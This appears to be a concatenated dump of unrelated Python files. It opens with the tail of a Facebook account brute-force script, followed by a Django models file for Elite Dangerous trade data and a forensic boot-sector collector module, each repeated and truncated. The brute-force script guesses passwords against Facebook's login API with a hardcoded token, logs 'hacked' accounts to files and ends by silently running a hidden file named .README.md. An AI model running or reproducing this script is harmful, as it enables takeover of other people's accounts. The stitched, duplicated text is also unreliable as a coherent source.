print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass14 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass14 + '\n')
okb.close()
oks.append(c + user + pass14)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass14 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass14 + '\n')
cps.close()
cpb.append(c + user + pass14)
else:
pass15 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass15 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass15 + '\n')
okb.close()
oks.append(c + user + pass15)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass15 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass15 + '\n')
cps.close()
cpb.append(c + user + pass15)
else:
pass16 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>16 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass16 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass16 + '\n')
okb.close()
oks.append(c + user + pass16)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass16 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass16 + '\n')
cps.close()
cpb.append(c + user + pass16)
pass17 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>17 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass17 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass17 + '\n')
okb.close()
oks.append(c + user + pass17)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass17 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass17 + '\n')
cps.close()
cpb.append(c + user + pass17)
else:
pass18 = 'password@'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>8 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass18 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass18 + '\n')
okb.close()
oks.append(c + user + pass18)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass18 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass18 + '\n')
cps.close()
cpb.append(c + user + pass18)
else:
pass19 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aab<PASSWORD>65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass19 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass19 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass19 + '\n')
okb.close()
oks.append(c + user + pass19)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass19 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass19 + '\n')
cps.close()
cpb.append(c + user + pass19)
else:
pass20 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass20 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass20 + '\n')
okb.close()
oks.append(c + user + pass20)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass20 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass20 + '\n')
cps.close()
cpb.append(c + user + pass20)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 50 * '-'
print '[\xe2\x9c\x93] \x1b[1;96mPROCESS HAS BEEN COMPLETED....'
print '[\xe2\x9c\x93] \x1b[1;96mTOTAL HACKED/CHECKPOINT : ' + str(len(oks)) + '/' + str(len(cpb))
print '[\xe2\x9c\x93] \x1b[1;96mCP FILE HAS BEEN SAVED : save/checkpoint.txt'
raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]')
os.system('python2 .README.md')
if __name__ == '__main__':
babaindseven() | 0.084887 | 0.069573 |
from django.db import models
from common.models import UUIDModel
# Create your models here.
class System(UUIDModel):
name = models.CharField(max_length=100)
needs_permit = models.NullBooleanField(default=False)
primary_economy = models.CharField(max_length=100, null=True)
population = models.BigIntegerField(default=0, null=True)
security = models.CharField(max_length=100, null=True)
allegiance = models.CharField(max_length=100, null=True)
government = models.CharField(max_length=100, null=True)
state = models.CharField(max_length=100, null=True)
faction = models.CharField(max_length=100, null=True)
power_control_faction = models.CharField(max_length=100, null=True)
x = models.FloatField()
y = models.FloatField()
z = models.FloatField()
updated_at = models.BigIntegerField()
def __str__(self):
return self.name
class Station(UUIDModel):
name = models.CharField(max_length=100)
system = models.ForeignKey(System, related_name="stations", editable=False)
type = models.CharField(max_length=100, null=True, blank=True)
max_landing_pad_size = models.CharField(max_length=100, null=True, blank=True) # L or M
distance_to_star = models.BigIntegerField(default=0, null=True, blank=True) # Might change depending on orbit???
allegiance = models.CharField(max_length=100, null=True, blank=True)
government = models.CharField(max_length=100, null=True, blank=True)
state = models.CharField(max_length=100, null=True, blank=True)
faction = models.CharField(max_length=100, null=True, blank=True)
has_repair = models.NullBooleanField(default=False, blank=True)
has_blackmarket = models.NullBooleanField(default=False, blank=True)
has_refuel = models.NullBooleanField(default=False, blank=True)
has_rearm = models.NullBooleanField(default=False, blank=True)
has_shipyard = models.NullBooleanField(default=False, blank=True)
has_outfitting = models.NullBooleanField(default=False, blank=True)
has_commodities = models.NullBooleanField(default=False, blank=True)
updated_at = models.BigIntegerField()
def __str__(self):
return self.name
class Commodity(UUIDModel):
name = models.CharField(max_length=100)
average_price = models.IntegerField(default=0, null=True, blank=True)
category_id = models.IntegerField(default=0, editable=False)
category_name = models.CharField(max_length=100, editable=False)
def __str__(self):
return self.name
class StationCommodity(UUIDModel):
commodity = models.ForeignKey(Commodity, related_name='station_commodities', editable=False)
station = models.ForeignKey(Station, related_name='station_commodities', editable=False)
buy_price = models.IntegerField(default=0)
supply = models.IntegerField(default=0)
supply_level = models.CharField(max_length=100, null=True, blank=True)
sell_price = models.IntegerField(default=0)
demand = models.IntegerField(default=0)
demand_level = models.CharField(max_length=100, null=True, blank=True)
created = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ['-created']
def __str__(self):
return '%s/%s(%i/%i)' % (str(self.station), str(self.commodity), int(self.buy_price), int(self.sell_price)) | elitedata/models.py | from django.db import models
from common.models import UUIDModel
# Create your models here.
class System(UUIDModel):
name = models.CharField(max_length=100)
needs_permit = models.NullBooleanField(default=False)
primary_economy = models.CharField(max_length=100, null=True)
population = models.BigIntegerField(default=0, null=True)
security = models.CharField(max_length=100, null=True)
allegiance = models.CharField(max_length=100, null=True)
government = models.CharField(max_length=100, null=True)
state = models.CharField(max_length=100, null=True)
faction = models.CharField(max_length=100, null=True)
power_control_faction = models.CharField(max_length=100, null=True)
x = models.FloatField()
y = models.FloatField()
z = models.FloatField()
updated_at = models.BigIntegerField()
def __str__(self):
return self.name
class Station(UUIDModel):
name = models.CharField(max_length=100)
system = models.ForeignKey(System, related_name="stations", editable=False)
type = models.CharField(max_length=100, null=True, blank=True)
max_landing_pad_size = models.CharField(max_length=100, null=True, blank=True) # L or M
distance_to_star = models.BigIntegerField(default=0, null=True, blank=True) # Might change depending on orbit???
allegiance = models.CharField(max_length=100, null=True, blank=True)
government = models.CharField(max_length=100, null=True, blank=True)
state = models.CharField(max_length=100, null=True, blank=True)
faction = models.CharField(max_length=100, null=True, blank=True)
has_repair = models.NullBooleanField(default=False, blank=True)
has_blackmarket = models.NullBooleanField(default=False, blank=True)
has_refuel = models.NullBooleanField(default=False, blank=True)
has_rearm = models.NullBooleanField(default=False, blank=True)
has_shipyard = models.NullBooleanField(default=False, blank=True)
has_outfitting = models.NullBooleanField(default=False, blank=True)
has_commodities = models.NullBooleanField(default=False, blank=True)
updated_at = models.BigIntegerField()
def __str__(self):
return self.name
class Commodity(UUIDModel):
name = models.CharField(max_length=100)
average_price = models.IntegerField(default=0, null=True, blank=True)
category_id = models.IntegerField(default=0, editable=False)
category_name = models.CharField(max_length=100, editable=False)
def __str__(self):
return self.name
class StationCommodity(UUIDModel):
commodity = models.ForeignKey(Commodity, related_name='station_commodities', editable=False)
station = models.ForeignKey(Station, related_name='station_commodities', editable=False)
buy_price = models.IntegerField(default=0)
supply = models.IntegerField(default=0)
supply_level = models.CharField(max_length=100, null=True, blank=True)
sell_price = models.IntegerField(default=0)
demand = models.IntegerField(default=0)
demand_level = models.CharField(max_length=100, null=True, blank=True)
created = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ['-created']
def __str__(self):
return '%s/%s(%i/%i)' % (str(self.station), str(self.commodity), int(self.buy_price), int(self.sell_price)) | 0.619356 | 0.192217 |
from construct import *
import hexdump
import os
class EnvironmentVariable(object):
def __init__(self):
self.name = ""
self.value = ""
def environment_variable(self, current_machine):
list_env_var = []
for ve in current_machine.Win32_environment():
env_var = EnvironmentVariable()
env_var.name = ve.name
env_var.value = ve.VariableValue
list_env_var.append(env_var)
return list_env_var
def __str__(self):
output = ""
output += "Name : " + self.name + "\nValue :" + self.value
return output
class OperatingSystem(object):
def __init__(self):
self.version = ""
self.directory = ""
self.primary = ""
def os_information(self, current_machine):
for data in current_machine.Win32_OperatingSystem():
self.version = data.Caption
self.directory = data.SystemDirectory
self.primary = data.Primary
return self
def __str__(self):
output = ""
output += "\nOperating System :" + str(self.version) + "\nSystem Directory : " + str(
self.directory) + "\nPrimary Operating System : " + str(self.primary)
return output
class Disks(object):
def __init__(self):
self.Partitions = ""
self.physical = ""
self.bytesPerSector = 0
self.totalHeads = 0
self.totalSectors = 0
self.totalTracks = 0
self.tracksPerCylinder = 0
self.totalCylinders = 0
self.deviceID = ""
self.size = 0
def get_disk_information(self, current_machine):
disks = []
for physicalDisk in current_machine.Win32_DiskDrive():
disk = Disks()
disk.physical = physicalDisk.Caption
disk.deviceID = physicalDisk.DeviceID
disk.Partitions = physicalDisk.Partitions
disk.bytesPerSector = physicalDisk.BytesPerSector
disk.totalSectors = physicalDisk.TotalSectors
disk.totalCylinders = physicalDisk.TotalCylinders
disk.totalHeads = physicalDisk.TotalHeads
disk.totalSectors = physicalDisk.TotalSectors
disk.totalTracks = physicalDisk.TotalTracks
disk.tracksPerCylinder = physicalDisk.TracksPerCylinder
disk.size = physicalDisk.Size
disks.append(disk)
return disks
def __str__(self):
output = ""
output += "\nPhysical Disk : " + str(self.physical) + "\nPartitions : " + str(self.Partitions)
output += "\nBytes per sector : " + str(self.bytesPerSector) + "\nTotal Heads :" + str(self.totalHeads)
output += "\nTotal Sectors : " + str(self.totalSectors) + "\nTotal Tracks :" + str(
self.totalTracks) + "\nTracks per Cylinder : " + str(self.tracksPerCylinder)
output += "\nTotal Cylinders : " + str(self.totalCylinders) + "\nSize :" + str(self.size) + "\n"
return output
class Partitions:
def __init__(self, path, logger):
self.logger = logger
self.path = path
self.type = ""
self.partName = ""
self.blockSize = 0
self.size = 0
self.bootSectorStruct = ""
self.disk = ""
self.bytesPerSector = 0
self.sectorPerCluster = 0
self.reservedSectors = ""
self.sectorsPerTrack = 0
self.numberOfHeads = 0
self.hiddenSectors = 0
self.totalSectors = 0
self.mftLogicalClusterNumber = 0
self.mftmirrLogicalClusterNumber = 0
self.clusterPerFileRecordSegment = 0
self.clustersPerIndexBuffer = 0
self.volumeSerialNumber = 0
self.numberCopiesFat = 0
self.maximumRootEntryDirectories = 0
self.numberOfSectorsSmaller32mb = 0
self.sectorsNumberFat = 0
self.fat32DriveVersion = ""
self.sectorNumberFsInformation = 0
self.sectorNumberPartition = 0
self.sectorNumberBackupBoot = 0
self.serialNumberPartition = ""
self.fatName = ""
self.possibleRootEntryNumber = 0
self.numberOfSectorsSmaller32mb
self.hexaBootSector = ""
self.fat12BootSector = Struct("FAT12 boot sector",
Bytes("jump", 3),
ULInt64("OEM_name"),
ULInt16("bytesPerSector"),
ULInt8("sectors_per_cluster"),
ULInt16("reservedSectors"),
ULInt8("number_copies_fat"),
ULInt16("possible_root_entry _number"),
ULInt16("number_of_sectors_smaller_32mb"),
ULInt8("media_descriptor"),
ULInt16("sectors_per_fat"),
ULInt16("sectorsPerTrack"),
ULInt16("number_of_head"),
ULInt32("number_hidden_sectors"),
ULInt32("large_number_sector_greater_32mb"),
ULInt8("drive_number"),
ULInt8("reserved"),
ULInt8("extended_boot_signature"),
ULInt32("volumeSerialNumber"),
Bytes("volume_label", 11),
ULInt64("fs_type"),
Bytes("bootstrap_code", 448),
ULInt16("signature")
)
self.fat16BootSector = Struct("FAT16 boot sector",
Bytes("jump", 3),
ULInt64("OEM_name"),
ULInt16("bytesPerSector"),
ULInt8("sectors_per_cluster"),
ULInt16("reservedSectors"),
ULInt8("number_copies_fat"),
ULInt16("maximum_root_entry _directories"),
ULInt16("number_of_sectors_smaller_32mb"),
ULInt8("media_descriptor"),
ULInt16("sectors_per_fat"),
ULInt16("sectorsPerTrack"),
ULInt16("number_of_head"),
ULInt32("number_hidden_sectors"),
ULInt32("sectors_number_partition"),
ULInt16("logical_drive_number"),
ULInt8("extended_signature"),
ULInt32("serial_number_partition"),
Bytes("volume_name_partition", 11),
ULInt64("fat_name"),
Bytes("executable_code", 448),
Bytes("signature", 2)
)
self.fat32BootSector = Struct("FAT32 boot sector",
Bytes("jump", 3),
ULInt64("OEM_name"),
ULInt16("bytesPerSector"),
ULInt8("sectors_per_cluster"),
Bytes("reservedSectors", 2),
ULInt8("number_copies_fat"),
ULInt16("maximum_root_entry _directories"),
ULInt16("number_of_sectors_smaller_32mb"),
ULInt8("media_descriptor"),
ULInt16("secors_per_fat_olderfatsystem"),
ULInt16("sectorsPerTrack"),
ULInt16("number_of_head"),
ULInt32("number_hidden_sectors"),
ULInt32("sectors_number_partition"),
ULInt32("sectors_number_fat"),
ULInt16("flags"),
ULInt16("fat32Drive_version"),
ULInt32("cluster_number_start_of_rootDirectory"),
ULInt16("sector_number_fs_information"),
ULInt16("sector_number_backupBoot"),
Bytes("reserved", 12),
ULInt8("logical_drive_number"),
Bytes("unused", 1),
ULInt8("extended_signature"),
ULInt32("serial_number_partition"),
Bytes("volume_name_partition", 11),
ULInt64("fat_name"),
Bytes("executable_code", 420),
Bytes("signature", 2)
)
self.bootSectorNtfs = Struct("NTFS boot sector",
Bytes("jump", 3),
Bytes("oem_id", 8),
ULInt16("bytesPerSector"),
ULInt8("sectors_per_cluster"),
Bytes("reservedSectors", 2),
Bytes("always 0", 3),
ULInt16("not used by NTFS"),
ULInt8("Media descriptor"),
Bytes("always0", 2),
ULInt16("sectorsPerTrack"),
ULInt16("numberOfHeads"),
ULInt32("hiddenSectors"),
Bytes("not_used_by_ntfs", 8),
ULInt64("totalSectors"),
ULInt64("mftLogicalClusterNumber"),
ULInt64("mftmirrLogicalClusterNumber"),
ULInt32("clusterPerFileRecordSegment"),
ULInt8("clustersPerIndexBuffer"),
Bytes("not_used_ntfs", 3),
ULInt64("volumeSerialNumber"),
ULInt32("checksum")
)
def partition_information(self, current_machine):
list_partitions = []
for physicalDisk in current_machine.Win32_DiskDrive():
for partitions in physicalDisk.associators("Win32_DiskDriveToDiskPartition"):
for logicalDisk in partitions.associators("Win32_LogicalDiskToPartition"):
partition = Partitions(self.path, self.logger)
partition.disk = physicalDisk.Caption
partition.partName = logicalDisk.Caption
partition.type = logicalDisk.FileSystem
partition.blockSize = logicalDisk.BlockSize
partition.size = logicalDisk.Size
localDrive = partition.partName + "\\"
ntfsdrive = '\\\\.\\' + localDrive.replace('\\', '')
partition = self.boot_sector_info(ntfsdrive, partition.type, partition)
list_partitions.append(partition)
return list_partitions
def boot_sector_info(self, part, type, partition):
bootSector = self.save_boot_sector(part)
self.extract_hexa(bootSector)
try:
cap1 = self.hexaBootSector.decode("hex")
if type == "NTFS":
self.bootSectorStruct = self.bootSectorNtfs.parse(cap1)
partition.sectorPerCluster = self.bootSectorStruct.sectors_per_cluster
partition.bytesPerSector = self.bootSectorStruct.bytesPerSector
partition.clusterPerFileRecordSegment = self.bootSectorStruct.clusterPerFileRecordSegment
partition.clustersPerIndexBuffer = self.bootSectorStruct.clustersPerIndexBuffer
partition.hiddenSectors = self.bootSectorStruct.hiddenSectors
partition.mftLogicalClusterNumber = self.bootSectorStruct.mftLogicalClusterNumber
partition.mftmirrLogicalClusterNumber = self.bootSectorStruct.mftmirrLogicalClusterNumber
partition.numberOfHeads = self.bootSectorStruct.numberOfHeads
partition.reservedSectors = self.bootSectorStruct.reservedSectors
partition.sectorsPerTrack = self.bootSectorStruct.sectorsPerTrack
partition.totalSectors = self.bootSectorStruct.totalSectors
partition.volumeSerialNumber = self.bootSectorStruct.volumeSerialNumber
elif type == "Fat32":
self.bootSectorStruct = self.fat32BootSector.parse(cap1)
partition.sectorPerCluster = self.bootSectorStruct.sectors_per_cluster
partition.bytesPerSector = self.bootSectorStruct.bytesPerSector
partition.numberOfHeads = self.bootSectorStruct.number_of_head
partition.sectorsPerTrack = self.bootSectorStruct.sectorsPerTrack
partition.maximumRootEntryDirectories = self.bootSectorStruct.maximum_root_entry_directories
partition.numberOfSectorsSmaller32mb = self.bootSectorStruct.number_of_sectors_smaller_32mb
partition.sectorsNumberFat = self.bootSectorStruct.sectors_number_fat
partition.fat32DriveVersion = self.bootSectorStruct.fat32_drive_version
partition.sectorNumberFsInformation = self.bootSectorStruct.sector_number_fs_information
partition.sectorsNumberPartition = self.bootSectorStruct.sectors_number_partition
partition.sectorNumberBackupBoot = self.bootSectorStruct.sector_number_backup_boot
partition.serialNumberPartition = self.bootSectorStruct.serial_number_partition
partition.fatName = self.bootSectorStruct.fat_name
elif type == "Fat16":
self.bootSectorStruct = self.fat16BootSector.parse(cap1)
partition.sectorPerCluster = self.bootSectorStruct.sectors_per_cluster
partition.bytesPerSector = self.bootSectorStruct.bytesPerSector
partition.numberOfHeads = self.bootSectorStruct.number_of_head
partition.sectorsPerTrack = self.bootSectorStruct.sectorsPerTrack
partition.maximumRootEntryDirectories = self.bootSectorStruct.maximum_root_entry_directories
partition.numberOfSectorsSmaller32mb = self.bootSectorStruct.number_of_sectors_smaller_32mb
partition.sectorsNumberFat = self.bootSectorStruct.sectors_per_fat
partition.sectorNumberPartition = self.bootSectorStruct.sector_number_partition
partition.serialNumberPartition = self.bootSectorStruct.serial_number_partition
partition.fatName = self.bootSectorStruct.fat_name
elif type == "Fat12":
partition.sectorPerCluster = self.bootSectorStruct.sectors_per_cluster
partition.bytesPerSector = self.bootSectorStruct.bytesPerSector
partition.numberOfHeads = self.bootSectorStruct.number_of_head
partition.sectorsPerTrack = self.bootSectorStruct.sectorsPerTrack
partition.possibleRootEntryNumber = self.bootSectorStruct.possible_root_entry_number
partition.numberOfSectorsSmaller32mb = self.bootSectorStruct.number_of_sectors_smaller_32mb
partition.fatName = self.bootSectorStruct.fs_type
return partition
except Exception as inst:
self.logger.error("Error : ", inst)
def save_boot_sector(self, image):
try:
file_image = open(image, "rb")
file_boot = open(self.path + os.path.sep + "boot sector", "w")
file_boot.write(hexdump.hexdump(file_image.read(512), "return"))
file_image.close()
file_boot.close()
except Exception as inst:
self.logger.error("Extracting mbr failed")
return file_boot.name
def extract_hexa(self, boot_sector):
try:
h_file = open(boot_sector, "rb")
hex_str = ""
for line in h_file.readlines():
hex_str += line[10:58]
for i in hex_str.split(" "):
self.hexaBootSector += i
h_file.close()
except Exception as inst:
self.logger.error("Error Extract Hexadecimal of bootSector")
def __str__(self):
output = ""
if self.type == "NTFS":
output += "\nDisk :" + self.disk + "\nPartition name :" + self.partName + "\nType :" + self.type
output += "\nBlock size :" + str(self.blockSize) + "\nSize :" + str(self.size) + "\nTotal sectors : " + str(
self.totalSectors)
output += "\nBytes per sector : " + str(self.bytesPerSector) + "\nSectors per cluster : " + str(
self.sectorPerCluster)
output += "\nSectors per track : " + str(
self.sectorsPerTrack) # + "\nReserved sectors : " + str(self.reservedSectors)
output += "\nHidden sectors : " + str(self.hiddenSectors) + "\nNumber of heads : " + str(self.numberOfHeads)
output += "\nLogical cluster number of MFT : " + str(
self.mftLogicalClusterNumber) + "\nLogical cluster number of MFTMIRR : " + str(
self.mftmirrLogicalClusterNumber)
output += "\nClusters per file record segment : " + str(
self.clusterPerFileRecordSegment) + "\nVolume serial number : " + str(self.volumeSerialNumber) + "\n"
elif self.type == "Fat32":
output += "\nDisk :" + self.disk + "\nPartition name :" + self.partName + "\nType :" + self.type
output += "\nBlock size :" + str(self.blockSize) + "\nSize :" + str(
self.size) + "\nBytes per sector : " + str(self.bytesPerSector)
output += "\nSectors per cluster : " + str(self.sectorPerCluster) + "\nNumber of heads : " + str(
self.numberOfHeads)
output += "\nSectors per track : " + str(self.sectorsPerTrack) + "\nMaximum root entry directories :" + str(
self.maximumRootEntryDirectories)
output += "\nNumber of sectors in partition smaller than 32 mb : " + str(self.numberOfSectorsSmaller32mb)
output += "\nNumber of sectors per FAT : " + str(
self.sectorsNumberFat) + "\nVersion of FAT32 drive : " + str(self.fat32DriveVersion)
output += "\nSector number of the FileSystem information sector : " + str(self.sectorNumberFsInformation)
output += "\nSector number of the backupboot sector : " + str(
self.sectorNumberBackupBoot) + "\nSerial number of partition : " + str(
self.serialNumberPartition) + "\n"
elif self.type == "Fat16":
output += "\nDisk :" + self.disk + "\nPartition name :" + self.partName + "\nType :" + self.type
output += "\nBlock size :" + str(self.blockSize) + "\nSize :" + str(
self.size) + "\nBytes per sector : " + str(self.bytesPerSector)
output += "\nSectors per cluster : " + str(self.sectorPerCluster) + "\nNumber of heads : " + str(
self.numberOfHeads)
output += "\nSectors per track : " + str(self.sectorsPerTrack) + "\nMaximum root entry directories :" + str(
self.maximumRootEntryDirectories)
output += "\nNumber of sectors in partition smaller than 32 mb : " + str(self.numberOfSectorsSmaller32mb)
output += "\nNumber of sectors per FAT : " + str(
self.sectorsNumberFat) + "\nNumber of sectors in partition : " + str(self.sectorNumberPartition)
output += "\nSerial number of partition : " + str(self.serialNumberPartition) + "\nFat name : " + str(
self.fatName) + "\n"
elif self.type == "Fat12":
output += "\nDisk :" + self.disk + "\nPartition name :" + self.partName + "\nType :" + self.type
output += "\nBlock size :" + str(self.blockSize) + "\nSize :" + str(
self.size) + "\nBytes per sector : " + str(self.bytesPerSector)
output += "\nSectors per cluster : " + str(self.sectorPerCluster) + "\nNumber of heads : " + str(
self.numberOfHeads)
output += "\nSectors per track : " + str(self.sectorsPerTrack) + "\nPossible root entry number :" + str(
self.possibleRootEntryNumber)
output += "\nNumber of sectors in partition smaller than 32 mb : " + str(
self.numberOfSectorsSmaller32mb) + "\nFat name : " + str(self.fatName) + "\n"
return output | Fastir_Collector/dump/environment_settings.py | from construct import *
import hexdump
import os
class EnvironmentVariable(object):
def __init__(self):
self.name = ""
self.value = ""
def environment_variable(self, current_machine):
list_env_var = []
for ve in current_machine.Win32_environment():
env_var = EnvironmentVariable()
env_var.name = ve.name
env_var.value = ve.VariableValue
list_env_var.append(env_var)
return list_env_var
def __str__(self):
output = ""
output += "Name : " + self.name + "\nValue :" + self.value
return output
class OperatingSystem(object):
def __init__(self):
self.version = ""
self.directory = ""
self.primary = ""
def os_information(self, current_machine):
for data in current_machine.Win32_OperatingSystem():
self.version = data.Caption
self.directory = data.SystemDirectory
self.primary = data.Primary
return self
def __str__(self):
output = ""
output += "\nOperating System :" + str(self.version) + "\nSystem Directory : " + str(
self.directory) + "\nPrimary Operating System : " + str(self.primary)
return output
class Disks(object):
def __init__(self):
self.Partitions = ""
self.physical = ""
self.bytesPerSector = 0
self.totalHeads = 0
self.totalSectors = 0
self.totalTracks = 0
self.tracksPerCylinder = 0
self.totalCylinders = 0
self.deviceID = ""
self.size = 0
def get_disk_information(self, current_machine):
disks = []
for physicalDisk in current_machine.Win32_DiskDrive():
disk = Disks()
disk.physical = physicalDisk.Caption
disk.deviceID = physicalDisk.DeviceID
disk.Partitions = physicalDisk.Partitions
disk.bytesPerSector = physicalDisk.BytesPerSector
disk.totalSectors = physicalDisk.TotalSectors
disk.totalCylinders = physicalDisk.TotalCylinders
disk.totalHeads = physicalDisk.TotalHeads
disk.totalSectors = physicalDisk.TotalSectors
disk.totalTracks = physicalDisk.TotalTracks
disk.tracksPerCylinder = physicalDisk.TracksPerCylinder
disk.size = physicalDisk.Size
disks.append(disk)
return disks
def __str__(self):
output = ""
output += "\nPhysical Disk : " + str(self.physical) + "\nPartitions : " + str(self.Partitions)
output += "\nBytes per sector : " + str(self.bytesPerSector) + "\nTotal Heads :" + str(self.totalHeads)
output += "\nTotal Sectors : " + str(self.totalSectors) + "\nTotal Tracks :" + str(
self.totalTracks) + "\nTracks per Cylinder : " + str(self.tracksPerCylinder)
output += "\nTotal Cylinders : " + str(self.totalCylinders) + "\nSize :" + str(self.size) + "\n"
return output
class Partitions:
def __init__(self, path, logger):
self.logger = logger
self.path = path
self.type = ""
self.partName = ""
self.blockSize = 0
self.size = 0
self.bootSectorStruct = ""
self.disk = ""
self.bytesPerSector = 0
self.sectorPerCluster = 0
self.reservedSectors = ""
self.sectorsPerTrack = 0
self.numberOfHeads = 0
self.hiddenSectors = 0
self.totalSectors = 0
self.mftLogicalClusterNumber = 0
self.mftmirrLogicalClusterNumber = 0
self.clusterPerFileRecordSegment = 0
self.clustersPerIndexBuffer = 0
self.volumeSerialNumber = 0
self.numberCopiesFat = 0
self.maximumRootEntryDirectories = 0
self.numberOfSectorsSmaller32mb = 0
self.sectorsNumberFat = 0
self.fat32DriveVersion = ""
self.sectorNumberFsInformation = 0
self.sectorNumberPartition = 0
self.sectorNumberBackupBoot = 0
self.serialNumberPartition = ""
self.fatName = ""
self.possibleRootEntryNumber = 0
self.numberOfSectorsSmaller32mb
self.hexaBootSector = ""
self.fat12BootSector = Struct("FAT12 boot sector",
Bytes("jump", 3),
ULInt64("OEM_name"),
ULInt16("bytesPerSector"),
ULInt8("sectors_per_cluster"),
ULInt16("reservedSectors"),
ULInt8("number_copies_fat"),
ULInt16("possible_root_entry _number"),
ULInt16("number_of_sectors_smaller_32mb"),
ULInt8("media_descriptor"),
ULInt16("sectors_per_fat"),
ULInt16("sectorsPerTrack"),
ULInt16("number_of_head"),
ULInt32("number_hidden_sectors"),
ULInt32("large_number_sector_greater_32mb"),
ULInt8("drive_number"),
ULInt8("reserved"),
ULInt8("extended_boot_signature"),
ULInt32("volumeSerialNumber"),
Bytes("volume_label", 11),
ULInt64("fs_type"),
Bytes("bootstrap_code", 448),
ULInt16("signature")
)
self.fat16BootSector = Struct("FAT16 boot sector",
Bytes("jump", 3),
ULInt64("OEM_name"),
ULInt16("bytesPerSector"),
ULInt8("sectors_per_cluster"),
